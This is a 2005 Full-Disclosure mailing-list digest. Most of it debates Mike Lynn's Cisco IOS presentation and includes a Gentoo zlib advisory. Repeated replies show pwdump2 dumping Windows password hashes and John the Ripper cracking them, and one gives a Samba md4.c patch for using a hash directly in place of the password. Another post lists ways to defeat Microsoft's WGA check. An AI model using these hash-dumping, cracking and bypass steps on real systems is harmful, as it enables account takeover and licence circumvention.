Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead638
3212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b3
3e31fae0f4b82a73:::

C:\toolkit\passwords\pwdump> pwdump2 > passwords.dump
C:\toolkit\passwords\john>john -incremental passwords.dump
Loaded 4 passwords with no different salts (NT LM DES [24/32 4K])
TEST0R  (Administrator:2)
guesses: 1  time: 0:00:00:20  c/s: 9045001  trying: PMSBRK - HLEYKL


Thats on a 1.987mhz AMD processor in windows 2000, running about 
30 other things at once.



Hope this helps.

X u r r o n wrote:


hiya!
I have tried many softwares for cracking NTLM hashes, like NC4, 
Cain and have't tried Rainbow Crack yet.
Once i had to recover my XPs lost admin password and i spend 
around 1 day but Cain/NC4 were not able to guess that. Then i 
posted that hashes on some site and it did recover my passwd in 
around 5min. I want to know which technique they used to crack so 
fast ?


Xurron

--
--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2rc2 (MingW32)

iQIVAwUBQutb0a+LRXunxpxfAQK+3g//dof4pz4mFmqJOed4ehsBm+rrYDYsBqDq
1pwHhC9eHg72Ot/kij5DC7leEUNOH6BYi+UiDDOWWN3tvVnzHkHr3SmxGb6GBcyh
T9gmQcvkwq5beShtpCutXK51UCk70DmdKSbLnUGTFbofJHRb2j92zamjjSFnoyXr
r6mQ89mqxYy2dmxIUnbFFCWhUdr2sn0lVmwIX4cjjxQhOhKO5ouhxWy0FbHFuXt3
+OVNJ3LZWsbqmInEwSnTPw//YBbj4MVrE2RuxsqiAcZ7LJjuUoTX5ZIeZjw0/J7i
7YV1oLNeTqDBd9cCoshOXvHC9rLXaZ0ZX9oLfej7kxAGsQ1Yd6NXxHOJio4O0xeX
cLfItvV3TbESacg+O/MZc4VwOnrvHej9jADf49fteSjRs3uOx3aT9hSqVayJcyb1
zBINQbkIn3RiNOJj4/aKLm+uoJGioSGBRaw4BXvZSZ/1SixxmyDkJ0uo0a50dM7N
oxS6sgern8BljF20yhPEnPLQJPnD0NmgszpnAMUcbkydHiY3tseNBOeiSCB4Gft8
yHLAsHi1Om2tR25+dl+6mVnBlOHKa++lBius6wbymU3vbFSX0RXYuoz3p6npPpa2
irx0OcYT+OldV4YezKYIBPVa+/V5V7hOaGKGA3PpwLpVGSZwT9zqhVA2EimIhGeA
Ct6SEcxmUeY=
=+sl3
-END PGP SIGNATURE-




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




KEY: 0xA7C69C5F
PRINT: 694C 3495 BCC4 2F8B D794  6BD4 AF8B 457B A7C6 9C5F


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2rc2 (MingW32)

iQIUAwUBQuvuTa+LRXunxpxfAQL8sg/4xAvAcdXyegxlDsUwVt3DyiJsdgqkfH8j
vQUTOWjxLuRGgruG+ZZzelrmb0PMuZ5rtgk8gXyseicveuKsn+pDi0uWMI6tN7CI
C0TCJ5YCHxitAUuZM5g4AjmoXO7uHqUhsI38QS8jNH7RD3R58vahb1eEbg/9ka+J
Ltcm5TkWJCzjEtwEHUzwxIlwsIGL8kfvxN7hDkQDHQ42rNA1j00xJ8BAeK8qz6tz
4/9t6odNy4VcC

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Steve Friedl]

On Sat, Jul 30, 2005 at 05:16:15PM -0400, Micheal Espinola Jr wrote:
> Coercion is simply influence.  You can be coerced into a choice, but
> its still your choice - regardless if people like it or not.

This obliterates any distinction between "coercion" and "persuasion",
so why bother to have separate words? When you claim that "I have a gun
to your head" is the same as "pretty please with sugar on top", you
mark yourself as having a stunning poverty of perspective.

Steve

--- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Micheal Espinola Jr]

Coercion is simply influence.  You can be coerced into a choice, but
its still your choice - regardless if people like it or not.

On 7/30/05, Steve Friedl <[EMAIL PROTECTED]> wrote:
> On Sat, Jul 30, 2005 at 12:53:49PM -0400, Micheal Espinola Jr wrote:
> > It was Lynn's choice based on his statement to the press - and it was
> > still his choice no matter what the coercion might have been.
> 
> This is a strange conflation of "choice" and "coercion"; most thoughtful
> people consider some level of the latter obliterating the former.
> 
> Steve
> 
> 


-- 
ME2  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mike Lynn's controversialCiscoSecurity Presentation

[Geo.]

> >From what I understand (I am writing a major paper on Intellectual
Property
> Protection right now, the Joy of being a student) the creator of the data
> has the direct right under Title 17 and the DMCA to determine how the data
> will be used (hence expiring CDR's and DRM).

This is incorrect as far as title 17 goes, copyright only gives control over
making copies and public performance, there must be a contract for any
additional restrictions. See http://www.theyscrewedusagain.com if you want
some good info for your paper. I would suggest you take a look specifically
at the quote from the 1908 congress that extended copyright law to cover
music as well, pretty interesting stuff.
http://www.theyscrewedusagain.com/copyrightact1909.htm

Geo.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Lynn Preso.

[William Warren]

I will be interesting to see if somebody has camcorder coverage of it 
and if it gets released.


[EMAIL PROTECTED] wrote:

On Fri, 29 Jul 2005 23:54:31 PDT, [EMAIL PROTECTED] said:



using microsoft search technologies a mirror was located
http://www.securitylab.ru/_Exploits/2005/07/lynn-cisco.pdf



Somehow, I don't think a cease-and-desist court order from a US
court is going to bother these guys much. ;)




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee shall prosper; and 
every tongue that shall rise against thee in judgment thou shalt 
condemn. This is the heritage of the servants of the LORD, and their 
righteousness is of me, saith the LORD.


-- carpe ductum -- "Grab the tape"
CDTT (Certified Duct Tape Technician)

Linux user #322099
Machines:
206822
256638
276825
http://counter.li.org/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200507-28 ] AMD64 x86 emulation base libraries: Buffer overflow

[Thierry Carrez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200507-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: AMD64 x86 emulation base libraries: Buffer overflow
  Date: July 30, 2005
  Bugs: #100686
ID: 200507-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The x86 emulation base libraries for AMD64 contain a vulnerable version
of zlib which could potentially lead to execution of arbitrary code.

Background
==

The x86 emulation base libraries for AMD64 emulate the x86 (32-bit)
architecture on the AMD64 (64-bit) architecture.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  emul-linux-x86-baselibs< 2.2   >= 2.2
---
 # Package 1 only applies to AMD64 users.

Description
===

Earlier versions of emul-linux-x86-baselibs contain a vulnerable
version of zlib, which may lead to a buffer overflow.

Impact
==

By creating a specially crafted compressed data stream, attackers can
overwrite data structures for applications that use the x86 emulation
base libraries for AMD64, resulting in a Denial of Service and
potentially arbitrary code execution.

Workaround
==

There is no known workaround at this time.

Resolution
==

All AMD64 x86 emulation base libraries users should upgrade to the
latest version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/emul-linux-x86-baselibs-2.2"

References
==

  [ 1 ] GLSA 200507-05
http://www.gentoo.org/security/en/glsa/glsa-200507-05.xml
  [ 2 ] GLSA 200507-19
http://www.gentoo.org/security/en/glsa/glsa-200507-19.xml
  [ 3 ] CAN-2005-1849
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1849
  [ 4 ] CAN-2005-2096
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2096

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200507-28.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mike Lynn's controversial CiscoSecurity Presentation

[Georgi Guninski]

On Sat, Jul 30, 2005 at 03:19:47PM +, DAN MORRILL wrote:
> >From what I understand (I am writing a major paper on Intellectual 
> >Property 
> Protection right now, the Joy of being a student) the creator of the data 
> has the direct right under Title 17 and the DMCA to determine how the data 
> will be used (hence expiring CDR's and DRM).
> 
> If data is sent in error that does not limit or otherwise reduce the rights 
> of the data owner, and the data owner can request that the data be removed. 
> The data owner can also request assurances that the data has been removed 
> from all parties that they believe have copies of that data. Cisco in their 
> message has acted according to American law by requesting that all copies 
> of the data that is held in private hands be deleted as they are the acting 
> IP owners along with ISS. Cisco is acting as the agent of the IP owner 
> (much like RIAA and MPAA do for artists and movie makers).
> 
> Their request is quite legal, and at least they were polite about it.
>

oh, the first puppy on this thread iirc.

can you broadcast your message to outside usa jurisdiction, preferably via
paid commercials?

-- 
where do you want bill gates to go today?


 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Steve Friedl]

On Sat, Jul 30, 2005 at 12:53:49PM -0400, Micheal Espinola Jr wrote:
> It was Lynn's choice based on his statement to the press - and it was
> still his choice no matter what the coercion might have been.

This is a strange conflation of "choice" and "coercion"; most thoughtful
people consider some level of the latter obliterating the former.

Steve

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Micheal Espinola Jr]

It was Lynn's choice based on his statement to the press - and it was
still his choice no matter what the coercion might have been.

Larry had no right to take take that choice away, and I doubt anyone
here has the right nor the first-hand knowledge in order to pass
judgement on the reasons for Lynn's choice.

Based on Lynn's statements his motivation was patriotic.  Who are we
to judge that was not his intent for his intellectual property?

I ask you, how do you know it wasn't?

On 7/29/05, Ron DuFresne <[EMAIL PROTECTED]> wrote:
> On Fri, 29 Jul 2005, Micheal Espinola Jr wrote:
> 
> > That was a real dickhead thing to do.  The guy that wrote that made an
> > agreement with Cisco of his own free will.  Who do you think you are
> > to go against an agreement he made, with his own information?
> >
> > I sincerely hope it bites you in the arse.
> >
> 
> Was it free will, or the threat of jail and other difficulties?
> 
> Afterall, employment was not a show stopper for him, he quit to release
> his findings and gain glory in the crowds at hacker fests.  so was it
> really free will I ask again?
> 
> Thanks,
> 
> Ron DuFresne
> --
> "Sometimes you get the blues because your baby leaves you. Sometimes you 
> get'em
> 'cause she comes back." --B.B. King
>***testing, only testing, and damn good at it too!***
> 
> OK, so you're a Ph.D.  Just don't touch anything.
> 
> 
> 


-- 
ME2  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Defeating Microsoft WGA Validation Check

[shellcode]

ways to get arround WGA check:

1.) http://www.extended64.com/blogs/rafael/archive/2005/07/27/1026.aspx

2.) http://home19.inet.tele.dk/jys05000/

3.) http://www.boingboing.net/2005/07/28/microsoft_genuine_ad.html

4.) a.) install WGA
b.) in directory C:\documents and settings\all users\application
data\Windows Genuine Advantage\data\
c.) make file data.dat as read-only

5.) [got more to add?]

don't complain if they don't work (anymore)...

cheers,
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mike Lynn's controversial CiscoSecurity Presentation

[DAN MORRILL]

From what I understand (I am writing a major paper on Intellectual Property 
Protection right now, the Joy of being a student) the creator of the data 
has the direct right under Title 17 and the DMCA to determine how the data 
will be used (hence expiring CDR's and DRM).


If data is sent in error that does not limit or otherwise reduce the rights 
of the data owner, and the data owner can request that the data be removed. 
The data owner can also request assurances that the data has been removed 
from all parties that they believe have copies of that data. Cisco in their 
message has acted according to American law by requesting that all copies of 
the data that is held in private hands be deleted as they are the acting IP 
owners along with ISS. Cisco is acting as the agent of the IP owner (much 
like RIAA and MPAA do for artists and movie makers).


Their request is quite legal, and at least they were polite about it.

If anyone wants more data on this subject (which is way off topic for FD), I 
can provide it separately or as private conversation.


Regards,
Dan



Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. 
Please resend when you get those, it does not mean that the mail box is bad, 
merely that MSN mail is over worked at the time.







From: Daniel <[EMAIL PROTECTED]>
Reply-To: Daniel <[EMAIL PROTECTED]>
To: Russell Smoak <[EMAIL PROTECTED]>
CC: full-disclosure@lists.grok.org.uk, nanog@merit.edu, 
[EMAIL PROTECTED]
Subject: Re: [Full-disclosure]  Mike Lynn's controversial 
CiscoSecurity Presentation

Date: Sat, 30 Jul 2005 00:24:33 +0100

This raises an interesting point, if intellectual property is sent in
error, do any of the laws pertaining to said property apply 100% or is
there a weird shift of how they are applied?





On 7/29/05, Russell Smoak <[EMAIL PROTECTED]> wrote:
> All,
>
> These recipients received an email from Austin Mckinley as Cisco 
Systems.

>
> This messasge was sent in complete error and includes intellectual
> property of ISS and Cisco Systems.  Please delete and do not distrbute
> the information any further.
>
> If you have any quesitons, please contact the Cisco PSIRT team.
>
>
> Thank you for your cooperation.
>
>
>
> --
> Russell Smoak  <[EMAIL PROTECTED]>
> Sr. Manager, PSIRT
> Customer Assurance Programs
> c i s c o S y s t e m s
> Phone: 615-791-0972
> Cell: 615-545-6473
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_
Express yourself instantly with MSN Messenger! Download today - it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Geo.]

> Anyhow, as for Cisco's DJ's spinning "it's only an IPv6 thing you can all
> go home now...", isn't it humorous to see that IPv6 is supposed to be
> "that much more secure". Obviously I wouldn't believe Cisco when they
> state its IPv6 based only don't get me wrong, it's funny to see spin.

A few points.

1) Lynn was put onto this from something he found on a Chinese hacking site.
He hasn't actually said he invented this technique has he?

2) IPv6 is fairly common in Asia, isn't it? The "it's not an issue because
nobody uses IPv6" is a US centric viewpoint.

3) Cisco slipstreamed the patch and did a stealth release. The actual
advisory wasn't released until Lynn did his presentation.

4) If it's such a "who cares" type thing, why did Cisco try to snuff it out?
Obviously Cisco's spin and actions don't match here.

5) given the above, is it possible that this bug and possibly this technique
of getting root on routers was being used to spy on people? Remember back in
the late 90's when some ISP in McLean VA "accidentally" rerouted half of
Europe thru their network which just happens to be where the CIA
headquarters are?

http://news.com.com/Router+glitch+cuts+Net+access/2100-1033_3-279235.html

This type of exploit would appear to me to be exactly the type of useful
thing that intelligence services would love. Look at the facts, you could
tunnel smtp and/or http traffic thru anywhere you wanted leaving icmp
traffic passing the normal routes so that a traceroute shows nothing
suspicious. Could you ask for more?

Geo.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best way to crack NT passwds

[Paul Farrow]

Yup after I posted that I read your post, have to admit, searching a 
table full of hashes would be a hell of alot quicker than cracking it 
manually :]
But then again, I rarely crack any hashes (good memory for my own 
passwords) but anything for md5 i use passcracking.net/com.
But i suppose it wouldnt be difficult to code up a quick php page to 
fill a mysql dbase with incremental hashes generated on the fly... might 
look into it

(even though its no doubt been done) fun project for a rainy day i suppose.

[EMAIL PROTECTED] wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

rainbow crack finds this pass "Test0r" in 5-10sec and you doesn't need 
an huge machine to get it, if you like johnthe ripper, I heavly 
suggest you to generate your tables and start using rbcrack, because 
you are loosing your time on john, believe me :)


At 12:25 30/07/05, Paul Farrow wrote:

Chances are the system used by the website was a multi-processor 
beast of machine, able to maximise cpu time to cracking the passwords.
If you can get the password hash, then your best bet is to run it 
through jtr(john the ripper).


C:\toolkit\passwords\pwdump> pwdump2
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b50889
23fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a5
14fd17f:::
Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead638
3212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b3
3e31fae0f4b82a73:::

C:\toolkit\passwords\pwdump> pwdump2 > passwords.dump
C:\toolkit\passwords\john>john -incremental passwords.dump
Loaded 4 passwords with no different salts (NT LM DES [24/32 4K])
TEST0R  (Administrator:2)
guesses: 1  time: 0:00:00:20  c/s: 9045001  trying: PMSBRK - HLEYKL


Thats on a 1.987mhz AMD processor in windows 2000, running about 30 
other things at once.



Hope this helps.

X u r r o n wrote:


hiya!
I have tried many softwares for cracking NTLM hashes, like NC4, Cain 
and have't tried Rainbow Crack yet.
Once i had to recover my XPs lost admin password and i spend around 
1 day but Cain/NC4 were not able to guess that. Then i posted that 
hashes on some site and it did recover my passwd in around 5min. I 
want to know which technique they used to crack so fast ?


Xurron

--
--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2rc2 (MingW32)

iQIVAwUBQutb0a+LRXunxpxfAQK+3g//dof4pz4mFmqJOed4ehsBm+rrYDYsBqDq
1pwHhC9eHg72Ot/kij5DC7leEUNOH6BYi+UiDDOWWN3tvVnzHkHr3SmxGb6GBcyh
T9gmQcvkwq5beShtpCutXK51UCk70DmdKSbLnUGTFbofJHRb2j92zamjjSFnoyXr
r6mQ89mqxYy2dmxIUnbFFCWhUdr2sn0lVmwIX4cjjxQhOhKO5ouhxWy0FbHFuXt3
+OVNJ3LZWsbqmInEwSnTPw//YBbj4MVrE2RuxsqiAcZ7LJjuUoTX5ZIeZjw0/J7i
7YV1oLNeTqDBd9cCoshOXvHC9rLXaZ0ZX9oLfej7kxAGsQ1Yd6NXxHOJio4O0xeX
cLfItvV3TbESacg+O/MZc4VwOnrvHej9jADf49fteSjRs3uOx3aT9hSqVayJcyb1
zBINQbkIn3RiNOJj4/aKLm+uoJGioSGBRaw4BXvZSZ/1SixxmyDkJ0uo0a50dM7N
oxS6sgern8BljF20yhPEnPLQJPnD0NmgszpnAMUcbkydHiY3tseNBOeiSCB4Gft8
yHLAsHi1Om2tR25+dl+6mVnBlOHKa++lBius6wbymU3vbFSX0RXYuoz3p6npPpa2
irx0OcYT+OldV4YezKYIBPVa+/V5V7hOaGKGA3PpwLpVGSZwT9zqhVA2EimIhGeA
Ct6SEcxmUeY=
=+sl3
-END PGP SIGNATURE-





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[lsi]

> Just store the program in a frikking *ROM*, and disallow execution of
> opcodes from RAM.  It's called a Harvard architecture.

The problem with this will be speed, will it not?  It could be cached 
into RAM - but then it would be modifiable ... 

I also have a query relating to the assertion by Lynn that worms 
would be difficult to make, because different firmware has different 
offsets.  Surely this would be as simple as looping though a list:

if (firmware == x) { attackstring = ABC }
elseif (firmware == y) {attackstring = DEF }
elseif (firmware == z) {attackstring = GHI }
...
etc

Finally, I note from the narrative on tomsnetworking that while the 
presentation did not describe exactly how to make an attack script 
that gets root, it nonetheless showed off exactly that.  "At the 
beginning of his talk, Michael Lynn connected to a Cisco router, ran 
his shell script and obtained the "enable" prompt." [1]  

I thus conclude it's only a matter of time before an "autorooter" is 
developed for use against a wide variety of routers.

The window of vulnerability, which is at least three weeks old, 
opened wide on the 27th, and remains so.  No amount of legal 
posturing by anybody can change this.

[1] http://www.tomsnetworking.com/Sections-article131-page4.php

---
Stuart Udall
stuart [EMAIL PROTECTED] net - http://www.cyberdelix.net/

--- 
 * Origin: lsi: revolution through evolution (192:168/0.2)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best way to crack NT passwds

[[EMAIL PROTECTED]]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

rainbow crack finds this pass "Test0r" in 5-10sec and you doesn't 
need an huge machine to get it, if you like johnthe ripper, I heavly 
suggest you to generate your tables and start using rbcrack, because 
you are loosing your time on john, believe me :)


At 12:25 30/07/05, Paul Farrow wrote:
Chances are the system used by the website was a multi-processor 
beast of machine, able to maximise cpu time to cracking the 
passwords.
If you can get the password hash, then your best bet is to run it 
through jtr(john the ripper).


C:\toolkit\passwords\pwdump> pwdump2
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b50889
23fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a5
14fd17f:::
Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead638
3212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b3
3e31fae0f4b82a73:::

C:\toolkit\passwords\pwdump> pwdump2 > passwords.dump
C:\toolkit\passwords\john>john -incremental passwords.dump
Loaded 4 passwords with no different salts (NT LM DES [24/32 4K])
TEST0R  (Administrator:2)
guesses: 1  time: 0:00:00:20  c/s: 9045001  trying: PMSBRK - HLEYKL


Thats on a 1.987mhz AMD processor in windows 2000, running about 30 
other things at once.



Hope this helps.

X u r r o n wrote:


hiya!
I have tried many softwares for cracking NTLM hashes, like NC4, 
Cain and have't tried Rainbow Crack yet.
Once i had to recover my XPs lost admin password and i spend around 
1 day but Cain/NC4 were not able to guess that. Then i posted that 
hashes on some site and it did recover my passwd in around 5min. I 
want to know which technique they used to crack so fast ?


Xurron

--
--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2rc2 (MingW32)

iQIVAwUBQutb0a+LRXunxpxfAQK+3g//dof4pz4mFmqJOed4ehsBm+rrYDYsBqDq
1pwHhC9eHg72Ot/kij5DC7leEUNOH6BYi+UiDDOWWN3tvVnzHkHr3SmxGb6GBcyh
T9gmQcvkwq5beShtpCutXK51UCk70DmdKSbLnUGTFbofJHRb2j92zamjjSFnoyXr
r6mQ89mqxYy2dmxIUnbFFCWhUdr2sn0lVmwIX4cjjxQhOhKO5ouhxWy0FbHFuXt3
+OVNJ3LZWsbqmInEwSnTPw//YBbj4MVrE2RuxsqiAcZ7LJjuUoTX5ZIeZjw0/J7i
7YV1oLNeTqDBd9cCoshOXvHC9rLXaZ0ZX9oLfej7kxAGsQ1Yd6NXxHOJio4O0xeX
cLfItvV3TbESacg+O/MZc4VwOnrvHej9jADf49fteSjRs3uOx3aT9hSqVayJcyb1
zBINQbkIn3RiNOJj4/aKLm+uoJGioSGBRaw4BXvZSZ/1SixxmyDkJ0uo0a50dM7N
oxS6sgern8BljF20yhPEnPLQJPnD0NmgszpnAMUcbkydHiY3tseNBOeiSCB4Gft8
yHLAsHi1Om2tR25+dl+6mVnBlOHKa++lBius6wbymU3vbFSX0RXYuoz3p6npPpa2
irx0OcYT+OldV4YezKYIBPVa+/V5V7hOaGKGA3PpwLpVGSZwT9zqhVA2EimIhGeA
Ct6SEcxmUeY=
=+sl3
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Pavel Kankovsky]

On Fri, 29 Jul 2005, Frank Knobbe wrote:

> That means that the once thought-to-be-invulnerable boxes running IOS
> are in fact as vulnerable as a Windows boxes. Once you get process
> control, you can do whatever you like.

Hmm...the fact Cisco uses general purpose CPUs (e.g. PowerPC 4xx) in their
box has been shamelessly announced by "show version" for years. Perhaps
they should sue themselves?

The presentation is nice but it does not reveal nothing you cannot find 
out yourself with a Cisco box to play with and a little bit of ingenuity.

But I can understand why they make so much fuss about it. Lynn told the 
people the emperor wears no clothes. Emperors always freak out whan it 
happens.

> (What is TCB anyway? Certainly not Trusted Computing Base :)

No. It's Transmission Control Block. See RFC 793 "Transmission Control
Protocol".

"I don't know what this stands for, and neither did the people at Cisco I
spoke with", esp. the 2nd part, is something I find rather unbelievable.
Perhaps Lynn did not talk to the right people at Cisco. Or perhaps Cisco
has already finished its transformation to the modern kind of bussines and
got rid of anyone with a clue?

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best way to crack NT passwds

[Paul Farrow]

Chances are the system used by the website was a multi-processor beast 
of machine, able to maximise cpu time to cracking the passwords.
If you can get the password hash, then your best bet is to run it 
through jtr(john the ripper).


C:\toolkit\passwords\pwdump> pwdump2
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b5088923fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a514fd17f:::
Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead6383212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b33e31fae0f4b82a73:::

C:\toolkit\passwords\pwdump> pwdump2 > passwords.dump
C:\toolkit\passwords\john>john -incremental passwords.dump
Loaded 4 passwords with no different salts (NT LM DES [24/32 4K])
TEST0R  (Administrator:2)
guesses: 1  time: 0:00:00:20  c/s: 9045001  trying: PMSBRK - HLEYKL


Thats on a 1.987mhz AMD processor in windows 2000, running about 30 
other things at once.



Hope this helps.

X u r r o n wrote:


hiya!
I have tried many softwares for cracking NTLM hashes, like NC4, Cain 
and have't tried Rainbow Crack yet.
Once i had to recover my XPs lost admin password and i spend around 1 
day but Cain/NC4 were not able to guess that. Then i posted that 
hashes on some site and it did recover my passwd in around 5min. I 
want to know which technique they used to crack so fast ?


Xurron



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best way to crack NT passwds

[3APA3A]

Dear X u r r o n,

You  needn't  actually crack the password if you know your hash, because
cleartext password is never used in Windows environment. You could apply
this patch to md4.c from Samba distribution:

--- md4.c.orig  2004-04-04 11:37:00.0 +0400
  +++ md4.c   2004-10-27 23:01:31.0 +0400
  @@ -130,6 +130,21 @@
  C = 0x98badcfe;
  D = 0x10325476;
  +
  +   if(n == 64){
  +int j;
  +unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
  +for(j = 0; j<16; j++){
  + if(!strchr(hexd, in[(j<<2)]))break;
  + if(in[(j<<2)+1])break;
  + if(!strchr(hexd, in[(j<<2)+2]))break;
  + if(in[(j<<2)+3])break;
  + out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
  + out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
  +}
  +if(j == 16) return;
  +   }
  +
  while (n > 64) {
  copy64(M, in);
  mdfour64(M);

And  change  your  password with Samba utilities by entering NT password
hash (in HEX) instead of password then prompted.

--Saturday, July 30, 2005, 12:15:47 PM, you wrote to 
